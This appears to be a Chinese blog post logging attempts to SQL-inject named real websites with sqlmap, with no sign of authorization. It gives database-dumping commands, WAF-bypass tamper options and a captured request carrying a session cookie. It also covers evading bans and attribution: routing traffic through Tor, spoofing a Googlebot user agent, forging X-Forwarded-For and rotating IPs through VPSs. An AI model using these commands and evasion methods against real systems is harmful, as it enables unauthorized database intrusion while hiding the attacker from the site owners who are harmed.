接上base64注入
今天早上,测试了sqlmap.py -u "http://www.samilsys.com/project_detail.php?id=12" -v3 --dbs,发现原作者指令是可行的
但实测输出如下数据,简单观察应该是加入了防火墙(毕竟已经被当作教程在网上很长时间了),然后ip又被封了
测试结果:http://www.jianshu.com/p/a017d642b0dd
突破防火墙
在sqlmap中有很多绕过防火墙的模块,比如charencode.py和charunicodeencode.py
但在该例子中还是失败了。。。
保护自己ip
我将想你展示怎么样使用sqlmap和Onion路由器来保护你的IP,DNS等等,在linux中,在终端命令符为$时使用
sudo apt-get install tor tor-geoip
进入sqlmap的目录后:./sqlmap.py -u "http://www.targetvuln.com/index/php?cata_id=1" -b -a -tor –check-tor–user-agent="Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)"
参数–tor使用Tor,–check-tor会检查Tor是否被正确地使用,如果没有正确被使用,终端会提示错误信息。用户代理是googlebot,所有你的请求会被看起来像是Googlebot发出的一样。
利用sqlmap的Tor我们能够设置你的TOR代理来隐藏实际请求产生的地址
-tor-port,-tor-type:这两个参数能够帮你手动设置TOR代理,–check-tor参数会检查你的代理是否被正确地安装并正常的工作。
看来linux才是王道啊
测试一次ip就会被封,而且还是在已知正确命令的情况下,所以来找一下可以动态改ip的方法
绕过弱检测
修改HTTP 请求头中的 X-Forwarded-For,简称XFF
在火狐浏览器添加modify_headers组件
使用burp获得http请求头
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: text/plain
Referer: http://www.haust.edu.cn/searchlist.jsp?wbtreeid=1001
Content-Length: 183
Cookie: JSESSIONID=A9795F7DCBC8F90571AD48F342B0E401
X-Forwarded-For: 1.1.1.1
Connection: close
再去测试一下:
一运行那个命令就被封 了,修改XXF的方法再测试
无软用,个人理解,这种绕过弱检测,只是针对程序检测漏洞,面对防火墙应该没什么用
最实在的方法:
使用国外vps改ip地址,或者多个国内adsl切换
尽量避免方法:
user agent 伪装和轮换
cookies 的处理
访问时间间隔设长一点
但在sqlmap使用如何防ip被封还不得而知
参考网址:
https://imququ.com/post/x-forwarded-for-header-in-http.html
http://www.cnblogs.com/JohnABC/p/5275109.html
http://www.freebuf.com/articles/web/31568.html
网友评论